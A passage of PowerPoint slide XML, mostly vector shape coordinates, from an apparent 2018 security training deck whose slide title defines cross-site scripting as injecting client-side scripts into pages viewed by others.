                  <a:pt x="7767" y="10859"/>
                  <a:pt x="7751" y="10905"/>
                  <a:pt x="7723" y="10946"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7649" y="11054"/>
                  <a:pt x="7572" y="11261"/>
                  <a:pt x="7571" y="11354"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7571" y="11406"/>
                  <a:pt x="7551" y="11446"/>
                  <a:pt x="7513" y="11469"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7482" y="11488"/>
                  <a:pt x="7445" y="11519"/>
                  <a:pt x="7431" y="11538"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7417" y="11557"/>
                  <a:pt x="7326" y="11609"/>
                  <a:pt x="7228" y="11655"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6937" y="11790"/>
                  <a:pt x="6614" y="11983"/>
                  <a:pt x="6469" y="12110"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6394" y="12175"/>
                  <a:pt x="6320" y="12229"/>
                  <a:pt x="6303" y="12229"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6287" y="12229"/>
                  <a:pt x="6274" y="12240"/>
                  <a:pt x="6274" y="12254"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6274" y="12268"/>
                  <a:pt x="6225" y="12317"/>
                  <a:pt x="6166" y="12364"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5997" y="12495"/>
                  <a:pt x="5449" y="13007"/>
                  <a:pt x="5272" y="13198"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5068" y="13419"/>
                  <a:pt x="5031" y="13394"/>
                  <a:pt x="5133" y="13104"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5252" y="12765"/>
                  <a:pt x="5234" y="12650"/>
                  <a:pt x="5015" y="12372"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4914" y="12243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4303" y="12238"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3967" y="12235"/>
                  <a:pt x="3652" y="12221"/>
                  <a:pt x="3604" y="12207"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3521" y="12184"/>
                  <a:pt x="3515" y="12174"/>
                  <a:pt x="3508" y="12051"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3494" y="11811"/>
                  <a:pt x="3476" y="11745"/>
                  <a:pt x="3388" y="11617"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3340" y="11548"/>
                  <a:pt x="3294" y="11452"/>
                  <a:pt x="3284" y="11403"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3262" y="11282"/>
                  <a:pt x="3318" y="10832"/>
                  <a:pt x="3375" y="10679"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3422" y="10555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3578" y="10555"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3777" y="10555"/>
                  <a:pt x="3944" y="10473"/>
                  <a:pt x="4166" y="10268"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4390" y="10061"/>
                  <a:pt x="4506" y="9822"/>
                  <a:pt x="4485" y="9614"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4477" y="9536"/>
                  <a:pt x="4447" y="9418"/>
                  <a:pt x="4417" y="9352"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4388" y="9286"/>
                  <a:pt x="4372" y="9217"/>
                  <a:pt x="4382" y="9199"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4392" y="9180"/>
                  <a:pt x="4388" y="9174"/>
                  <a:pt x="4373" y="9185"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4346" y="9204"/>
                  <a:pt x="4298" y="9156"/>
                  <a:pt x="4289" y="9101"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4287" y="9085"/>
                  <a:pt x="4273" y="9076"/>
                  <a:pt x="4259" y="9080"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4223" y="9092"/>
                  <a:pt x="4160" y="9026"/>
                  <a:pt x="4177" y="8994"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4185" y="8980"/>
                  <a:pt x="4178" y="8972"/>
                  <a:pt x="4161" y="8976"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4103" y="8991"/>
                  <a:pt x="4108" y="8911"/>
                  <a:pt x="4167" y="8883"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4260" y="8838"/>
                  <a:pt x="4329" y="8760"/>
                  <a:pt x="4401" y="8614"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4460" y="8495"/>
                  <a:pt x="4468" y="8448"/>
                  <a:pt x="4467" y="8203"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4467" y="7974"/>
                  <a:pt x="4457" y="7901"/>
                  <a:pt x="4406" y="7776"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4373" y="7693"/>
                  <a:pt x="4332" y="7616"/>
                  <a:pt x="4315" y="7604"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4295" y="7589"/>
                  <a:pt x="4329" y="7529"/>
                  <a:pt x="4424" y="7417"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4592" y="7217"/>
                  <a:pt x="4682" y="7039"/>
                  <a:pt x="4720" y="6832"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4762" y="6598"/>
                  <a:pt x="4754" y="6460"/>
                  <a:pt x="4691" y="6336"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4534" y="6022"/>
                  <a:pt x="4461" y="5970"/>
                  <a:pt x="4094" y="5912"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3971" y="5892"/>
                  <a:pt x="3856" y="5861"/>
                  <a:pt x="3838" y="5843"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3814" y="5818"/>
                  <a:pt x="3811" y="5773"/>
                  <a:pt x="3829" y="5665"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3842" y="5585"/>
                  <a:pt x="3866" y="5321"/>
                  <a:pt x="3882" y="5079"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3942" y="4177"/>
                  <a:pt x="3984" y="3649"/>
                  <a:pt x="3999" y="3623"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4007" y="3608"/>
                  <a:pt x="4045" y="3621"/>
                  <a:pt x="4083" y="3653"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4122" y="3684"/>
                  <a:pt x="4185" y="3719"/>
                  <a:pt x="4225" y="3731"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4298" y="3752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4281" y="3535"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4260" y="3259"/>
                  <a:pt x="4188" y="2852"/>
                  <a:pt x="4085" y="2427"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4041" y="2244"/>
                  <a:pt x="4002" y="2079"/>
                  <a:pt x="3999" y="2060"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3995" y="2041"/>
                  <a:pt x="3981" y="1994"/>
                  <a:pt x="3968" y="1957"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3927" y="1842"/>
                  <a:pt x="3892" y="1934"/>
                  <a:pt x="3783" y="2439"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3644" y="3084"/>
                  <a:pt x="3592" y="3444"/>
                  <a:pt x="3447" y="4771"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3417" y="5053"/>
                  <a:pt x="3383" y="5296"/>
                  <a:pt x="3372" y="5310"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3344" y="5347"/>
                  <a:pt x="3117" y="4885"/>
                  <a:pt x="3133" y="4825"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3142" y="4793"/>
                  <a:pt x="3129" y="4762"/>
                  <a:pt x="3097" y="4743"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3010" y="4689"/>
                  <a:pt x="2980" y="4521"/>
                  <a:pt x="2981" y="4110"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2982" y="3799"/>
                  <a:pt x="2993" y="3696"/>
                  <a:pt x="3037" y="3553"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3066" y="3457"/>
                  <a:pt x="3084" y="3367"/>
                  <a:pt x="3077" y="3354"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3062" y="3324"/>
                  <a:pt x="2813" y="3527"/>
                  <a:pt x="2653" y="3699"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2586" y="3772"/>
                  <a:pt x="2513" y="3831"/>
                  <a:pt x="2493" y="3831"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2472" y="3831"/>
                  <a:pt x="2462" y="3842"/>
                  <a:pt x="2469" y="3857"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2477" y="3871"/>
                  <a:pt x="2450" y="3936"/>
                  <a:pt x="2409" y="4001"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2169" y="4383"/>
                  <a:pt x="2089" y="4764"/>
                  <a:pt x="2298" y="4530"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2421" y="4393"/>
                  <a:pt x="2444" y="4450"/>
                  <a:pt x="2367" y="4698"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2331" y="4811"/>
                  <a:pt x="2269" y="5028"/>
                  <a:pt x="2227" y="5182"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2091" y="5678"/>
                  <a:pt x="2130" y="5980"/>
                  <a:pt x="2288" y="5649"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2374" y="5469"/>
                  <a:pt x="2419" y="5487"/>
                  <a:pt x="2446" y="5714"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2477" y="5979"/>
                  <a:pt x="2615" y="6270"/>
                  <a:pt x="2802" y="6468"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2894" y="6565"/>
                  <a:pt x="2960" y="6650"/>
                  <a:pt x="2949" y="6656"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2938" y="6663"/>
                  <a:pt x="2860" y="6671"/>
                  <a:pt x="2776" y="6675"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2600" y="6684"/>
                  <a:pt x="2506" y="6729"/>
                  <a:pt x="2359" y="6875"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2191" y="7040"/>
                  <a:pt x="2170" y="7113"/>
                  <a:pt x="2190" y="7441"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2210" y="7762"/>
                  <a:pt x="2271" y="7948"/>
                  <a:pt x="2418" y="8127"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2531" y="8266"/>
                  <a:pt x="2512" y="8335"/>
                  <a:pt x="2354" y="8365"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2295" y="8376"/>
                  <a:pt x="2220" y="8410"/>
                  <a:pt x="2185" y="8442"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2150" y="8473"/>
                  <a:pt x="2104" y="8499"/>
                  <a:pt x="2085" y="8499"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2065" y="8499"/>
                  <a:pt x="2055" y="8511"/>
                  <a:pt x="2062" y="8525"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2070" y="8539"/>
                  <a:pt x="2054" y="8573"/>
                  <a:pt x="2028" y="8601"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1938" y="8694"/>
                  <a:pt x="1866" y="8940"/>
                  <a:pt x="1871" y="9131"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1874" y="9228"/>
                  <a:pt x="1879" y="9333"/>
                  <a:pt x="1883" y="9365"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1906" y="9549"/>
                  <a:pt x="2084" y="9857"/>
                  <a:pt x="2263" y="10021"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2321" y="10075"/>
                  <a:pt x="2378" y="10137"/>
                  <a:pt x="2388" y="10158"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2412" y="10207"/>
                  <a:pt x="2302" y="10303"/>
                  <a:pt x="2162" y="10356"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2108" y="10377"/>
                  <a:pt x="2064" y="10408"/>
                  <a:pt x="2064" y="10426"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2064" y="10443"/>
                  <a:pt x="1978" y="10538"/>
                  <a:pt x="1873" y="10636"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1706" y="10792"/>
                  <a:pt x="1447" y="11096"/>
                  <a:pt x="1156" y="11480"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="984" y="11707"/>
                  <a:pt x="823" y="12004"/>
                  <a:pt x="624" y="12463"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="514" y="12717"/>
                  <a:pt x="423" y="12939"/>
                  <a:pt x="423" y="12955"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="423" y="13016"/>
                  <a:pt x="296" y="13315"/>
                  <a:pt x="269" y="13315"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="254" y="13315"/>
                  <a:pt x="248" y="13339"/>
                  <a:pt x="257" y="13369"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="265" y="13398"/>
                  <a:pt x="242" y="13527"/>
                  <a:pt x="206" y="13655"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-2" y="14386"/>
                  <a:pt x="-45" y="15038"/>
                  <a:pt x="44" y="16133"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="95" y="16762"/>
                  <a:pt x="166" y="17012"/>
                  <a:pt x="442" y="17540"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="530" y="17708"/>
                  <a:pt x="601" y="17863"/>
                  <a:pt x="601" y="17883"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="601" y="17903"/>
                  <a:pt x="576" y="18036"/>
                  <a:pt x="546" y="18179"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="464" y="18558"/>
                  <a:pt x="470" y="19021"/>
                  <a:pt x="561" y="19373"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="670" y="19793"/>
                  <a:pt x="766" y="19961"/>
                  <a:pt x="1022" y="20172"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1163" y="20288"/>
                  <a:pt x="1175" y="20307"/>
                  <a:pt x="1176" y="20411"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1176" y="20549"/>
                  <a:pt x="1261" y="20767"/>
                  <a:pt x="1498" y="21235"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1680" y="21595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9952" y="21595"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15153" y="21595"/>
                  <a:pt x="18231" y="21584"/>
                  <a:pt x="18240" y="21567"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18249" y="21551"/>
                  <a:pt x="18232" y="21489"/>
                  <a:pt x="18204" y="21428"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18175" y="21367"/>
                  <a:pt x="18152" y="21294"/>
                  <a:pt x="18152" y="21267"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18152" y="21240"/>
                  <a:pt x="18134" y="21137"/>
                  <a:pt x="18112" y="21037"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18051" y="20762"/>
                  <a:pt x="18061" y="20755"/>
                  <a:pt x="18335" y="20898"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18572" y="21022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19169" y="21021"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19735" y="21020"/>
                  <a:pt x="19775" y="21017"/>
                  <a:pt x="19906" y="20953"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20110" y="20855"/>
                  <a:pt x="20507" y="20544"/>
                  <a:pt x="20683" y="20345"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20767" y="20250"/>
                  <a:pt x="20846" y="20172"/>
                  <a:pt x="20859" y="20172"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20872" y="20171"/>
                  <a:pt x="20884" y="20144"/>
                  <a:pt x="20887" y="20112"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20889" y="20080"/>
                  <a:pt x="20932" y="19982"/>
                  <a:pt x="20983" y="19894"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21104" y="19685"/>
                  <a:pt x="21341" y="19075"/>
                  <a:pt x="21395" y="18834"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21513" y="18310"/>
                  <a:pt x="21555" y="17778"/>
                  <a:pt x="21511" y="17367"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21468" y="16956"/>
                  <a:pt x="21365" y="16464"/>
                  <a:pt x="21286" y="16285"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21145" y="15965"/>
                  <a:pt x="20758" y="15472"/>
                  <a:pt x="20460" y="15231"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20352" y="15143"/>
                  <a:pt x="20263" y="15060"/>
                  <a:pt x="20263" y="15046"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20263" y="15031"/>
                  <a:pt x="20247" y="15027"/>
                  <a:pt x="20227" y="15036"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20207" y="15045"/>
                  <a:pt x="20143" y="14998"/>
                  <a:pt x="20077" y="14925"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19940" y="14772"/>
                  <a:pt x="19883" y="14580"/>
                  <a:pt x="19873" y="14234"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19868" y="14057"/>
                  <a:pt x="19852" y="13967"/>
                  <a:pt x="19804" y="13856"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19748" y="13726"/>
                  <a:pt x="19721" y="13700"/>
                  <a:pt x="19547" y="13601"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19353" y="13491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19349" y="12926"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19345" y="12311"/>
                  <a:pt x="19335" y="12238"/>
                  <a:pt x="19176" y="11686"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19125" y="11508"/>
                  <a:pt x="19081" y="11356"/>
                  <a:pt x="19079" y="11348"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19074" y="11322"/>
                  <a:pt x="19037" y="11220"/>
                  <a:pt x="18976" y="11062"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18943" y="10978"/>
                  <a:pt x="18909" y="10872"/>
                  <a:pt x="18900" y="10827"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18890" y="10783"/>
                  <a:pt x="18849" y="10670"/>
                  <a:pt x="18809" y="10577"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18769" y="10484"/>
                  <a:pt x="18740" y="10402"/>
                  <a:pt x="18743" y="10395"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18747" y="10387"/>
                  <a:pt x="18732" y="10364"/>
                  <a:pt x="18710" y="10343"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18622" y="10259"/>
                  <a:pt x="18481" y="10025"/>
                  <a:pt x="18498" y="9993"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18509" y="9972"/>
                  <a:pt x="18505" y="9966"/>
                  <a:pt x="18489" y="9978"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18474" y="9989"/>
                  <a:pt x="18419" y="9928"/>
                  <a:pt x="18365" y="9843"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18311" y="9758"/>
                  <a:pt x="18217" y="9616"/>
                  <a:pt x="18156" y="9527"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18016" y="9324"/>
                  <a:pt x="17301" y="8482"/>
                  <a:pt x="17082" y="8260"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16793" y="7968"/>
                  <a:pt x="16346" y="7698"/>
                  <a:pt x="15837" y="7508"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15522" y="7391"/>
                  <a:pt x="15394" y="7362"/>
                  <a:pt x="15087" y="7339"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14677" y="7308"/>
                  <a:pt x="14334" y="7404"/>
                  <a:pt x="14315" y="7556"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14301" y="7669"/>
                  <a:pt x="14385" y="7876"/>
                  <a:pt x="14520" y="8063"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14707" y="8323"/>
                  <a:pt x="14724" y="8387"/>
                  <a:pt x="14703" y="8762"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14694" y="8936"/>
                  <a:pt x="14694" y="9141"/>
                  <a:pt x="14704" y="9216"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14725" y="9380"/>
                  <a:pt x="14837" y="9543"/>
                  <a:pt x="14948" y="9571"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14989" y="9582"/>
                  <a:pt x="15028" y="9601"/>
                  <a:pt x="15035" y="9614"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15042" y="9626"/>
                  <a:pt x="15002" y="9800"/>
                  <a:pt x="14946" y="9999"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14891" y="10198"/>
                  <a:pt x="14845" y="10377"/>
                  <a:pt x="14845" y="10397"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14845" y="10417"/>
                  <a:pt x="14832" y="10470"/>
                  <a:pt x="14816" y="10516"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14800" y="10561"/>
                  <a:pt x="14788" y="10607"/>
                  <a:pt x="14789" y="10618"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14796" y="10658"/>
                  <a:pt x="14674" y="11176"/>
                  <a:pt x="14651" y="11202"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14629" y="11227"/>
                  <a:pt x="13745" y="10904"/>
                  <a:pt x="13655" y="10838"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13628" y="10818"/>
                  <a:pt x="13630" y="10800"/>
                  <a:pt x="13662" y="10744"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13684" y="10705"/>
                  <a:pt x="13707" y="10604"/>
                  <a:pt x="13714" y="10519"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13721" y="10434"/>
                  <a:pt x="13755" y="10192"/>
                  <a:pt x="13789" y="9982"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13871" y="9488"/>
                  <a:pt x="13971" y="8649"/>
                  <a:pt x="14008" y="8147"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14029" y="7859"/>
                  <a:pt x="14056" y="7682"/>
                  <a:pt x="14109" y="7497"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14279" y="6903"/>
                  <a:pt x="14339" y="6214"/>
                  <a:pt x="14355" y="4668"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14365" y="3677"/>
                  <a:pt x="14360" y="3401"/>
                  <a:pt x="14327" y="3111"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14232" y="2276"/>
                  <a:pt x="13962" y="1624"/>
                  <a:pt x="13460" y="1011"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13241" y="745"/>
                  <a:pt x="13078" y="605"/>
                  <a:pt x="12795" y="439"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12727" y="399"/>
                  <a:pt x="12654" y="355"/>
                  <a:pt x="12633" y="340"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12612" y="326"/>
                  <a:pt x="12503" y="278"/>
                  <a:pt x="12391" y="234"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11981" y="73"/>
                  <a:pt x="11471" y="-5"/>
                  <a:pt x="10978" y="1"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1428" name="Injecting client-side scripts into pages viewed by others."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Injecting client-side scripts into pages viewed by others.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1429"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1430"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431" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1432" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1433" name="DEFINITION"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20250661" y="358292"/>
            <a:ext cx="3717418" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3F7CA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DEFINITION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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37"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438"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439" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
